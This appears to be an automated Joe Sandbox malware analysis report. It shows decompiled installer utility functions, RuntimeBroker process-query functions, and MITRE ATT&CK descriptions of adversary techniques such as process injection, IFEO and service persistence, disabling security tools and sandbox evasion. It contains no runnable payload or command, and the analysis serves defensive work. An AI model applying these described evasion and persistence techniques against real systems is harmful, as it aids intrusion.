Failed to update resume mode., xrefs: 012871D7
Failed to open registration key., xrefs: 012871BD

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to open registration key.$Failed to update resume mode.
API String ID: 47109696-3366686031
Opcode ID: c687a225d9822bbef35e5d5a442954e573cc5cba8d10c1fcbb0be7a75edadc74
Instruction ID: 199f700e5c78a1476a44c8ae250fa893b246e0771dbce74ae12697639aa58bac
Opcode Fuzzy Hash: c687a225d9822bbef35e5d5a442954e573cc5cba8d10c1fcbb0be7a75edadc74
Instruction Fuzzy Hash: 57F0F677671305BBDB12AA94DC41FEE7BBBEB80355F300029F901A3280DAB0EA00A650

Uniqueness

Uniqueness Score: -1.00%

Function 012B56AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E012B56AA(void* __ecx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int* _t9;
				signed int _t13;
				void* _t17;
				signed int _t18;
				void* _t20;
				signed int* _t21;

				_t21 = _a8;
				_t9 =  &_v12;
				_t18 = 0;
				 *_t21 =  *_t21 & 0;
				_t21[1] = _t21[1] & 0;
				__imp__GetFileSizeEx(_a4, _t9, _t17, _t20, __ecx, __ecx);
				if(_t9 != 0) {
					 *_t21 = _v12;
					_t21[1] = _v8;
				} else {
					_t13 = GetLastError();
					if(_t13 > 0) {
						_t13 = _t13 & 0x0000ffff | 0x80070000;
					}
					_t18 = _t13;
					if(_t18 >= 0) {
						_t18 = 0x80004005;
					}
					E012B294E(_t13, "fileutil.cpp", 0x244, _t18);
				}
				return _t18;
			}

0x012b56b0
0x012b56b4
0x012b56bb
0x012b56bd
0x012b56bf
0x012b56c2
0x012b56ca
0x012b5700
0x012b5705
0x012b56cc
0x012b56cc
0x012b56d4
0x012b56db
0x012b56db
0x012b56e0
0x012b56e4
0x012b56e6
0x012b56e6
0x012b56f6
0x012b56f6
0x012b570d

APIs

GetFileSizeEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0128277F,?,?,?,00000000,00000000), ref: 012B56C2
GetLastError.KERNEL32(?,?,?,0128277F,?,?,?,00000000,00000000,?,?,?,773D9EB0,?,00000000), ref: 012B56CC

Strings

fileutil.cpp, xrefs: 012B56F1

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: 54e7b78d852e09f9ce8f1765fd27981ef2d3ac6ce53d197d8ad553bf2f1abb9d
Instruction ID: a3a075a0abf4f9c969a21e9feb8baa15ec29b9fdd39335daa59a577002a1b8eb
Opcode Fuzzy Hash: 54e7b78d852e09f9ce8f1765fd27981ef2d3ac6ce53d197d8ad553bf2f1abb9d
Instruction Fuzzy Hash: 72F09676620206AFD7209F59DC49AEE7BFCEF857B1B10402DE989DB200E674E9008B60

Uniqueness

Uniqueness Score: -1.00%

Function 012B5640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E012B5640(void* _a4, void* _a8, union _LARGE_INTEGER* _a12, union _LARGE_INTEGER* _a16, intOrPtr _a20) {
				union _LARGE_INTEGER* _t12;
				signed int _t14;
				signed int _t19;

				_push(_a20);
				_t19 = 0;
				if(SetFilePointerEx(_a4, _a8, _a12,  &_a8) != 0) {
					_t12 = _a16;
					if(_t12 != 0) {
						 *_t12 = _a8;
						_t12->LowPart.HighPart = _a12;
					}
				} else {
					_t14 = GetLastError();
					if(_t14 > 0) {
						_t14 = _t14 & 0x0000ffff | 0x80070000;
					}
					_t19 = _t14;
					if(_t19 >= 0) {
						_t19 = 0x80004005;
					}
					E012B294E(_t14, "fileutil.cpp", 0x208, _t19);
				}
				return _t19;
			}

0x012b5644
0x012b564e
0x012b565e
0x012b5691
0x012b5696
0x012b569b
0x012b56a0
0x012b56a0
0x012b5660
0x012b5660
0x012b5668
0x012b566f
0x012b566f
0x012b5674
0x012b5678
0x012b567a
0x012b567a
0x012b568a
0x012b568a
0x012b56a7

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,01297D44,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 012B5656
GetLastError.KERNEL32(?,01297D44,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,012995E8,00000000,?), ref: 012B5660

Strings

fileutil.cpp, xrefs: 012B5685

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: a4f88a0128c93182f68ba72090c957765228da62a4bd29f3a4a832165e225682
Instruction ID: a3344ced5f9daea08735306ff7c48bf625ad5694c4bdfa13d42cf1eeecf872a6
Opcode Fuzzy Hash: a4f88a0128c93182f68ba72090c957765228da62a4bd29f3a4a832165e225682
Instruction Fuzzy Hash: 0BF04F7166021BAFDB219E55EC48EAA7F98EF147E0F018024FE18DF220D631D9208BE0

Uniqueness

Uniqueness Score: -1.00%

Function 012A00D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E012A00D7(void* __ecx, signed int* _a4) {
				void* __edi;
				void* _t5;
				signed int* _t15;

				_t15 = _a4;
				_t2 =  &(_t15[6]); // 0xf08b8007
				_t14 = 0;
				if( *_t2 == 1) {
					_t14 = E012A5AA9(__ecx, 0, _t15);
					if(_t14 < 0) {
						_push("Failed to close cabinet.");
						_push(_t14);
						E012AFA86();
					}
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					CloseHandle(_t5);
					 *_t15 =  *_t15 | 0xffffffff;
				}
				if(_t14 >= 0) {
					E012A7E30(_t15, 0, 0x58);
				}
				return _t14;
			}

0x012a00db
0x012a00de
0x012a00e2
0x012a00e5
0x012a00ed
0x012a00f1
0x012a00f3
0x012a00f8
0x012a00f9
0x012a00ff
0x012a00f1
0x012a0100
0x012a0105
0x012a0108
0x012a010e
0x012a010e
0x012a0113
0x012a011a
0x012a011f
0x012a0127

APIs

CloseHandle.KERNEL32(F08B8006,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12,00000000,?,01281E22,2BAB1868,01281E22,?,?), ref: 012A0108
_memset.LIBCMT ref: 012A011A

Part of subcall function 012A5AA9: SetEvent.KERNEL32(526A5680,01282222,01281E22,?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12,00000000), ref: 012A5ACA
Part of subcall function 012A5AA9: GetLastError.KERNEL32(?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12,00000000,?,01281E22,2BAB1868), ref: 012A5AD4
Part of subcall function 012A5AA9: CloseHandle.KERNEL32(004005BE,00000000,01282222,01281E22,?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12), ref: 012A5B70
Part of subcall function 012A5AA9: CloseHandle.KERNEL32(526A5680,00000000,01282222,01281E22,?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12), ref: 012A5B7D
Part of subcall function 012A5AA9: CloseHandle.KERNEL32(2BAD1468,00000000,01282222,01281E22,?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12), ref: 012A5B8A

Strings

Failed to close cabinet., xrefs: 012A00F3

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle$ErrorEventLast_memset
String ID: Failed to close cabinet.
API String ID: 1352847294-2920093955
Opcode ID: 684b3584801bf10cfb2f9283e26002c43e90370e7dc3093e90e6604ab5e52c3d
Instruction ID: 1afdf32e03564c8407ed03b0e3f3ef4fb481e9d70eb6f9738896ca2cdb454fc3
Opcode Fuzzy Hash: 684b3584801bf10cfb2f9283e26002c43e90370e7dc3093e90e6604ab5e52c3d
Instruction Fuzzy Hash: 1CF0EC32360A0537D3225A5DAC42E9B77999FD5771F600319FBA8E32C1DB65B80606EC

Uniqueness

Uniqueness Score: -1.00%

Function 012B4F42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E012B4F42(void* __eax, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t9;
				void* _t13;
				intOrPtr* _t16;
				void* _t17;

				_t16 = _a4;
				if(_t16 == 0 || _a12 == 0) {
					return 0x80070057;
				} else {
					__imp__#2(_a8, _t13);
					if(__eax != 0) {
						_t9 =  *((intOrPtr*)( *_t16 + 0x1c))(_t16, __eax, _a12);
						_t17 = _t9;
						__imp__#6(__eax);
					} else {
						_t17 = 0x8007000e;
						E012B294E(0x8007000e, "xmlutil.cpp", 0x348, 0x8007000e);
					}
					return _t17;
				}
			}

0x012b4f46
0x012b4f4b
0x00000000
0x012b4f53
0x012b4f57
0x012b4f61
0x012b4f83
0x012b4f87
0x012b4f89
0x012b4f63
0x012b4f73
0x012b4f75
0x012b4f75
0x00000000
0x012b4f91

APIs

SysAllocString.OLEAUT32(?), ref: 012B4F57
SysFreeString.OLEAUT32(00000000), ref: 012B4F89

Strings

xmlutil.cpp, xrefs: 012B4F6E

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 13e95705834e81cdc5aa806c7db5be76cda534f7393f42583bd52cb88561cc93
Instruction ID: 15918fa87c31425c643b683b94d4ceb74f302ed4e06ea05a67d009ee25f1e7e9
Opcode Fuzzy Hash: 13e95705834e81cdc5aa806c7db5be76cda534f7393f42583bd52cb88561cc93
Instruction Fuzzy Hash: 3CF024315203A5EBCB216E589C8CE9A77A8AF417E1B144115FE059B311C7B4D9008790

Uniqueness

Uniqueness Score: -1.00%

Function 012B4E4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E012B4E4B(void* __eax, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t9;
				void* _t13;
				intOrPtr* _t16;
				void* _t17;

				if(_a12 == 0) {
					L6:
					return 0x80070057;
				}
				_t16 = _a4;
				if(_t16 == 0) {
					goto L6;
				}
				__imp__#2(_a8, _t13);
				if(__eax != 0) {
					_t9 =  *((intOrPtr*)( *_t16 + 0xbc))(_t16, __eax, _a12);
					_t17 = _t9;
					__imp__#6(__eax);
				} else {
					_t17 = 0x8007000e;
					E012B294E(0x8007000e, "xmlutil.cpp", 0x6e, 0x8007000e);
				}
				return _t17;
			}

0x012b4e53
0x012b4e9d
0x00000000
0x012b4e9d
0x012b4e55
0x012b4e5a
0x00000000
0x00000000
0x012b4e60
0x012b4e6a
0x012b4e89
0x012b4e90
0x012b4e92
0x012b4e6c
0x012b4e79
0x012b4e7b
0x012b4e7b
0x00000000

APIs

SysAllocString.OLEAUT32(00000000), ref: 012B4E60
SysFreeString.OLEAUT32(00000000), ref: 012B4E92

Strings

xmlutil.cpp, xrefs: 012B4E74

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 6721b8ce6671a3ad89c948a1acb990739ecdbec9cb8f453c7cccde38d4d1330a
Instruction ID: d6be1025a9f814b0faaebff383882e7b9413d25fc32beb2ea352091bf78d0b16
Opcode Fuzzy Hash: 6721b8ce6671a3ad89c948a1acb990739ecdbec9cb8f453c7cccde38d4d1330a
Instruction Fuzzy Hash: ACF024325253A5E7CB212E189C88F9A77A8AF817A0F144029FE09AB211C3B0D91087D0

Uniqueness

Uniqueness Score: -1.00%

Function 012B315B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B315B(void* __eflags) {
				_Unknown_base(*)()* _t3;
				void* _t4;

				_t4 = E012B2A2D(L"AdvApi32.dll", 0x12d5dec);
				if(_t4 >= 0) {
					_t3 = GetProcAddress( *0x12d5dec, "RegDeleteKeyExW");
					 *0x12d5de8 = _t3;
					if( *0x12d5de4 == 0) {
						 *0x12d5de4 = _t3;
					}
					 *0x12d5df0 = 1;
				}
				return _t4;
			}

0x012b316b
0x012b316f
0x012b317c
0x012b3189
0x012b318e
0x012b3190
0x012b3190
0x012b3195
0x012b3195
0x012b31a2

APIs

Part of subcall function 012B2A2D: _memset.LIBCMT ref: 012B2A54
Part of subcall function 012B2A2D: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 012B2A69
Part of subcall function 012B2A2D: LoadLibraryW.KERNELBASE(?,?,00000104,01281C3B), ref: 012B2AB7
Part of subcall function 012B2A2D: GetLastError.KERNEL32 ref: 012B2AC3

GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 012B317C

Strings

AdvApi32.dll, xrefs: 012B3161
RegDeleteKeyExW, xrefs: 012B3171

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AddressDirectoryErrorLastLibraryLoadProcSystem_memset
String ID: AdvApi32.dll$RegDeleteKeyExW
API String ID: 2769571726-850864035
Opcode ID: 3a2b2ff8219c0c73aeb97ca762d8e6fe6b1f8756cb4fdec2bf8e6bdf116df214
Instruction ID: 5f1f927ff3c9281f62a9dc0406b6f7378881d24221d4c3bcb682e124b205ea8e
Opcode Fuzzy Hash: 3a2b2ff8219c0c73aeb97ca762d8e6fe6b1f8756cb4fdec2bf8e6bdf116df214
Instruction Fuzzy Hash: 5CE0EC70A733119BC371AB55F84C7853A74A7007D6B104199E6859A159E7F158428BA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RuntimeBroker.exePID: 7008, Parent PID: 564COMMON

Executed Functions

Function 00007FFF7F0383B8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFF7F038571

Strings

NY!, xrefs: 00007FFF7F038411
NY!, xrefs: 00007FFF7F0385EE

Memory Dump Source

Source File: 0000002B.00000002.499089215.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7fff7f030000_RuntimeBroker.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID: NY!$NY!
API String ID: 3578328331-742187057
Opcode ID: 03249d65aaaf77e0fafa28924738dbb3cca2206e9363466c3d7761c6cdce2f31
Instruction ID: 082b9d1d38ff041fee8a1097b15aeae5ed772e8613de7fa6e45b409867d79e4c
Opcode Fuzzy Hash: 03249d65aaaf77e0fafa28924738dbb3cca2206e9363466c3d7761c6cdce2f31
Instruction Fuzzy Hash: 6681C031918A8D8FDB68DF2888557F977E1FF59321F04427EE84EC7392CA34A8458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFF7F0300EA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFF7F038571

Strings

NY!, xrefs: 00007FFF7F038411
NY!, xrefs: 00007FFF7F0385EE

Memory Dump Source

Source File: 0000002B.00000002.499089215.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7fff7f030000_RuntimeBroker.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID: NY!$NY!
API String ID: 3578328331-742187057
Opcode ID: 066d5148fe1beb7d8395604dcff8cadf7719cb4d4ea166b58117a22548085c76
Instruction ID: 56abbb1f5c2c5d5f744056d34c435f20e1b13f8bdac2890f68add312fd640fd9
Opcode Fuzzy Hash: 066d5148fe1beb7d8395604dcff8cadf7719cb4d4ea166b58117a22548085c76
Instruction Fuzzy Hash: 24716C31918A4D8FDB68DF1898567F977E1FF68321F10427EE84EC7392DA74A8418B81

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., `C:\dbg\ntsd.exe -g notepad.exe` ).
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Tactics:	Credential Access, Discovery
Data Sources:	Host network interface, Netflow/Enclave netflow, Network device logs, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ywvz5i8kT9

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\4863269369430a9b27\$shtdwn$.req

